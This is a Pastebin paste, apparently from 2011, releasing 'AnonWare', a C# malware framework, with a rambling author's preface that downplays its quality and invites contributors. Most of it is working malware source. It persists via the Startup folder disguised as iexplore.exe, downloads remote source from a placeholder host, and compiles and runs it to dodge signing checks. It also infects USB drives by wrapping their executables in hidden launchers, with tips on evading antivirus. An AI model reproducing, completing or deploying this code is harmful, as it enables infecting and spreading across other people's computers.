Pastebin is 300% more awesome when you are logged in. Sign Up, it's FREE!
Guest

set the record straight AnonWare opensource malwareframework

By: opendev on Jul 31st, 2011  |  syntax: C#  |  size: 15.34 KB  |  hits: 3,311  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. AnonWare 1.0 RELEASE: http://pastebin.com/5f4C79VA
  2.  
  3. UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^)
  4.  
  5. TO SET THE RECORD STRAIGHT:
  6. as for allegations that my code is 'amaturish, lazy, etc.' i would like to say that it's completely true :) the code provided here *IS* just a C# compiler (with a little extra) and shouldn't be taken as some kind of super awesome virus released by a group of Anonymous hackers. it's something me, a bad programmer, threw together in a couple hours and decided to paste on pastebin.
  7. oh, and fortherecord, i was a little high, and, retrospectively, the comments were definitely over-optimistic. and when the reporter from the tech herald contacted me, i assumed that he was a developer, and he took interest in the code. i naturally was like, well i guess it is pretty cool...and let my ego get ahead of myself. i would like to formally apologize to fellow Anonymous members for providing such a simple framework
  8. and then acting inapropriately like it was an awesome new idea.
  9.  
  10. as for encryption/obfuscation
  11. encryption/obfuscation was something i was assuming the devs could add to the framework; i didn't think it would be something i should put in the framework. besides; if i put a specific kind of obfuscation/encryption into the framework as it was, it would be pretty easy for the a/v vendors to just find a flaw in one part of my encryption code and then use that to exploit all future editions of it.
  12. that doesn't allign well with what the 'framework' is, more of like the standard stuff so you can add on your own stuff so that a/v doesn't have one standard thing to go off.
  13. UPDATE: we now have encryption ^_^ check out our github repo for more info
  14.  
  15. as for existing malware frameworks
  16. once again, alittle high, way to optimistic comments ^^_^^
  17. as for the existing malware frameworks pointed out, all of them are either pay-to-use or really hard to find the source for. i provided AnonWare as a service that's simple to find and easy to modify
  18.  
  19. for the future:
  20. i will release the FIRST version of AnonWare a couple days after #RefRef is released. hopefully, it will include encryption/obfuscation, a seperate edition for people that want to create rouge AV and other software. i have an idea for using it with #RefRef, and will get everything ready for integration with #RefRef while we wait for the #RefRef team to complete development. i emphasize FIRST because it seems some people misunderstood
  21. the point of AnonWare...it was counterintuitive for the Sophos researcher to provide malware detection for it since what is provided here is nowhere near completed malware. also the tech hareld reporter may have misunderstood, partially by sending the code to the researches. i'm not blaming anyone for this; i acted like it was bigger than it was, and as a result reporters and the public may have been dissapointed when reading thru the code.
  22.  
  23. finally, please help AnonWare :P if you can do any type of development, i would love it if you could help improve the code, translate the code, etc.
  24.  
  25. ty. tyvm.
  26.  
  27. NOW BACK TO THE REST OF THE PASTE!
  28.  
  29. note - keep in mind that this is nowhere near a completed virus, just sumthing i threw together in a day ^_^
  30. if you would like to use this at all, you're gonna need to add a lot to the code...it's just the absolute simplest parts of malware
  31.  
  32. ///(update: no longer accepting code improvements :( will post updated code when i create it)
  33. ///(update#2: nvrm, gonna post it on github and let ppl play arnd with it)
  34. ///kthx
  35.  
  36. Program.cs contents:
  37.  
  38.  
  39. using System;
  40. using System.Collections.Generic;
  41. using System.Linq;
  42. using System.Text;
  43. using Microsoft.CSharp;
  44. using System.Diagnostics;
  45. using System.Runtime.InteropServices;
  46. using System.Management;
  47. using System.Threading;
  48. using System.CodeDom.Compiler;
  49. using System.Net;
  50. using System.IO;
  51.  
  52. namespace AnonWare_CSharp
  53. {
  54.     class Program
  55.     {
  56.         static void Main()
  57.         {
  58.             string appdatapath = Environment.GetEnvironmentVariable("appdata").ToString();
  59.             //when it starts, app checks whether or not it's set to run on startup
  60.             if (File.Exists(appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe")) //we're using iexplore.exe as our fake identity :P check in Properties -> assembly name 2 change it. keep in mind that XP might have a different startup folder than then Win 7 and Vista. this is the path for 7 and vista startup folder
  61.             {
  62.             }
  63.             else
  64.             {
  65.                 //if it isn't, do this
  66.                 File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe");
  67.             }
  68.         }
  69.         public static string watsdasource;
  70.         static void compile()
  71.         {
  72.             //we're using runtime compilation instead of just downloading an exe to go around the whole program is not signed by msft shit
  73.             try
  74.             {
  75.                 CSharpCodeProvider myCodeProvider = new CSharpCodeProvider();
  76.                 ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler();
  77.                 String[] referenceAssemblies = { "System.dll" }; //if you plan to do more than really simple stuff with it, add stuff to this list (seperate them with commas)
  78.                 string myAssemblyName = "assemble.exe";
  79.                 CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName);
  80.                 myCompilerParameters.GenerateExecutable = true;
  81.                 myCompilerParameters.GenerateInMemory = true;
  82.                 WebClient x = new WebClient();
  83.                 Stream y = x.OpenRead("http://sumsite.com/sumfile.txt"); //link to txt file containing source code (nothing matters except that it's a text file, name it anything you want)
  84.                 StreamReader z = new StreamReader(y);
  85.                 string source = z.ReadToEnd();
  86.                 if (source != watsdasource)
  87.                 {
  88.                     watsdasource = source;
  89.                     z.Close();
  90.                     y.Close();
  91.                     CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source);
  92.                     Process.Start("assemble.exe"); //for AV purposes, it's recommended that you change the name of this, or even make the name self-creating (see 'for all your randomness needs' below) ^_^
  93.                 }
  94.                 else
  95.                 {
  96.                     z.Close();
  97.                     y.Close();
  98.                 }
  99.             }
  100.             catch
  101.             {
  102.                 //uh oh...
  103.             }
  104.         }
  105.         //for all your randomness needs! ^_^
  106.         public static string GetPassword()
  107.         {
  108.             StringBuilder builder = new StringBuilder();
  109.             builder.Append(RandomString(4, true));
  110.             builder.Append(RandomNumber(1000, 9999));
  111.             builder.Append(RandomString(2, false));
  112.             return builder.ToString();
  113.         }
  114.         private static int RandomNumber(int min, int max)
  115.         {
  116.             Random random = new Random();
  117.             return random.Next(min, max);
  118.         }
  119.         private static string RandomString(int size, bool lowerCase)
  120.         {
  121.             StringBuilder builder = new StringBuilder();
  122.             Random random = new Random();
  123.             char ch;
  124.             for (int i = 0; i < size; i++)
  125.             {
  126.                 ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
  127.                 builder.Append(ch);
  128.             }
  129.             if (lowerCase)
  130.                 return builder.ToString().ToLower();
  131.             return builder.ToString();
  132.         }
  133.     }
  134. }
  135.  
  136.  
  137. reproduction.cs contents:
  138.  
  139. ///reproduction.cs contains some nice, but still not near finished, code that turns AnonWare into a virus ^_^
  140. ///check thru psuedocode for more info :P
  141. ///TODO:
  142. ///intercept exe files before they're uploaded, compressed, or downloaded.
  143. ///instead of using a fake directory, actually copy the exe into the new wrapper ^^_^^
  144. ///spread thru la world!
  145.  
  146. using System;
  147. using System.Collections.Generic;
  148. using System.Linq;
  149. using System.Text;
  150. using Microsoft.CSharp;
  151. using System.Diagnostics;
  152. using System.Runtime.InteropServices;
  153. using System.Management;
  154. using System.Threading;
  155. using System.CodeDom.Compiler;
  156. using System.Net;
  157. using System.IO;
  158.  
  159. namespace AnonWare_CSharp
  160. {
  161.     class reproduction
  162.     {
  163.         public void reproduce()
  164.         {
  165.             Properties.Settings.Default.filename = GetPassword() + ".exe";
  166.             Properties.Settings.Default.Save();
  167.             string fname = Properties.Settings.Default.filename;
  168.             File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), Properties.Settings.Default.filename);
  169.         }
  170.         public void usbinject()
  171.         {
  172.             ///<psuedocode>
  173.             ///foreach [program] x in [directory] y
  174.             ///{
  175.             ///MOVE PROGRAMS INTO GetPassword including the CHILD
  176.             ///CREATE COMPILER
  177.             ///string source = "yadayda" + GetPassword\filename.exe + "moaryada" + GetPassword\Settings.Default.filename + "even MOAR yadyada";
  178.             ///COMPILE & PLACE IN PLACE OF ORIGINAL EXE
  179.             ///}
  180.             ///</psuedocode>
  181.             //this could really be improved...
  182.             if(Directory.Exists(@"F:\"))
  183.             {
  184.                 if (GetDirectorySize(@"F:\") < 20000000.00 & GetDirectorySize(@"F:\") != 0) //i *think* that means 20 MB... it would really sux if it meant 20 GB or 20 KB xD
  185.                 {
  186.                     INJECT(@"F:\");
  187.                 }
  188.             }
  189.             if (Directory.Exists(@"G:\"))
  190.             {
  191.                 if (GetDirectorySize(@"G:\") < 20000000.00 & GetDirectorySize(@"G:\") != 0)
  192.                 {
  193.                     INJECT(@"G:\");
  194.                 }
  195.             }
  196.             if (Directory.Exists(@"H:\"))
  197.             {
  198.                 if (GetDirectorySize(@"H:\") < 20000000.00 & GetDirectorySize(@"H:\") != 0)
  199.                 {
  200.                     INJECT(@"H:\");
  201.                 }
  202.             }
  203.             if (Directory.Exists(@"I:\"))
  204.             {
  205.                 if (GetDirectorySize(@"I:\") < 20000000.00 & GetDirectorySize(@"I:\") != 0)
  206.                 {
  207.                     INJECT(@"I:\");
  208.                 }
  209.             }
  210.             if (Directory.Exists(@"J:\"))
  211.             {
  212.                 if (GetDirectorySize(@"J:\") < 20000000.00 & GetDirectorySize(@"J:\") != 0)
  213.                 {
  214.                     INJECT(@"J:\");
  215.                 }
  216.             }
  217.             if (Directory.Exists(@"Z:\"))
  218.             {
  219.                 if (GetDirectorySize(@"Z:\") < 20000000.00 & GetDirectorySize(@"Z:\") != 0)
  220.                 {
  221.                     INJECT(@"Z:\");
  222.                 }
  223.             }
  224.             if (Directory.Exists(@"D:\"))
  225.             {
  226.                 if (GetDirectorySize(@"D:\") < 20000000.00 & GetDirectorySize(@"D:\") != 0)
  227.                 {
  228.                     INJECT(@"D:\");
  229.                 }
  230.             }
  231.         }
  232.         private void INJECT(string directorytoinject)
  233.         {
  234.             try
  235.             {
  236.                 string[] directorys = Directory.GetDirectories(directorytoinject);
  237.                 foreach (string dr in directorys)
  238.                 {
  239.                     if (File.Exists(dr + "info.aw"))
  240.                     {
  241.                         //It's ALIVE!
  242.                     }
  243.                 }
  244.                 string[] a = Directory.GetFiles(directorytoinject, "*.exe");
  245.                 string direct = directorytoinject + GetPassword();
  246.                 Directory.CreateDirectory(direct);
  247.                 string[] new1 = Properties.Settings.Default.filename.Split('.');
  248.                 string de1 = direct + @"\" + new1[0] + "anonwr.exe";
  249.                 File.Copy(Properties.Settings.Default.filename, de1);
  250.                 File.Copy(Properties.Settings.Default.filename, direct + @"\" + Properties.Settings.Default.filename);
  251.                 foreach (string nm in a)
  252.                 {
  253.                     string newName = GetPassword() + ".exe";
  254.                     string Direct = direct + @"\" + newName;
  255.                     File.Move(nm, Direct);
  256.                     CSharpCodeProvider myCodeProvider = new CSharpCodeProvider();
  257.                     ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler();
  258.                     String[] referenceAssemblies = { "System.dll" };
  259.                     string myAssemblyName = nm;
  260.                     CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName);
  261.                     myCompilerParameters.GenerateExecutable = true;
  262.                     myCompilerParameters.GenerateInMemory = false;
  263.                     string direct2 = direct + "\\" + Properties.Settings.Default.filename;
  264.                     string source = "using System; using System.Diagnostics; namespace anonwarebooter {  class Program {         static void Main(string[] args) {   try {   Process cmd = new Process();          string ags = \"/C " + Direct.Replace("\\", "\\\\") + "\";     cmd.StartInfo.FileName = \"cmd\";   cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;   cmd.StartInfo.Arguments = ags;   cmd.Start();   Process cmd2 = new Process();          string ags2 = \"/C " + de1.Replace("\\", "\\\\") + "\";     cmd2.StartInfo.FileName = \"cmd\";   cmd2.StartInfo.Arguments = ags2;   cmd2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;  cmd2.Start(); } catch { } }  }  }";
  265.                     CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source);
  266.                 }
  267.             }
  268.             catch
  269.             {
  270.             }
  271.         }
  272.         static long GetDirectorySize(string p)
  273.         {
  274.                 // 1
  275.                 // Get array of all file names.
  276.                 string[] a = Directory.GetFiles(p, "*.exe");
  277.  
  278.                 // 2
  279.                 // Calculate total bytes of all files in a loop.
  280.                 long b = 0;
  281.                 foreach (string name in a)
  282.                 {
  283.                     // 3
  284.                     // Use FileInfo to get length of each file.
  285.                     FileInfo info = new FileInfo(name);
  286.                     b += info.Length;
  287.                 }
  288.                 // 4
  289.                 // Return total size
  290.                 return b;
  291.         }
  292.         public string GetPassword()
  293.         {
  294.             StringBuilder builder = new StringBuilder();
  295.             builder.Append(RandomString(4, true));
  296.             builder.Append(RandomNumber(1000, 9999));
  297.             builder.Append(RandomString(2, false));
  298.             return builder.ToString();
  299.         }
  300.         private int RandomNumber(int min, int max)
  301.         {
  302.             Random random = new Random();
  303.             return random.Next(min, max);
  304.         }
  305.         private string RandomString(int size, bool lowerCase)
  306.         {
  307.             StringBuilder builder = new StringBuilder();
  308.             Random random = new Random();
  309.             char ch;
  310.             for (int i = 0; i < size; i++)
  311.             {
  312.                 ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
  313.                 builder.Append(ch);
  314.             }
  315.             if (lowerCase)
  316.                 return builder.ToString().ToLower();
  317.             return builder.ToString();
  318.         }
  319.     }
  320. }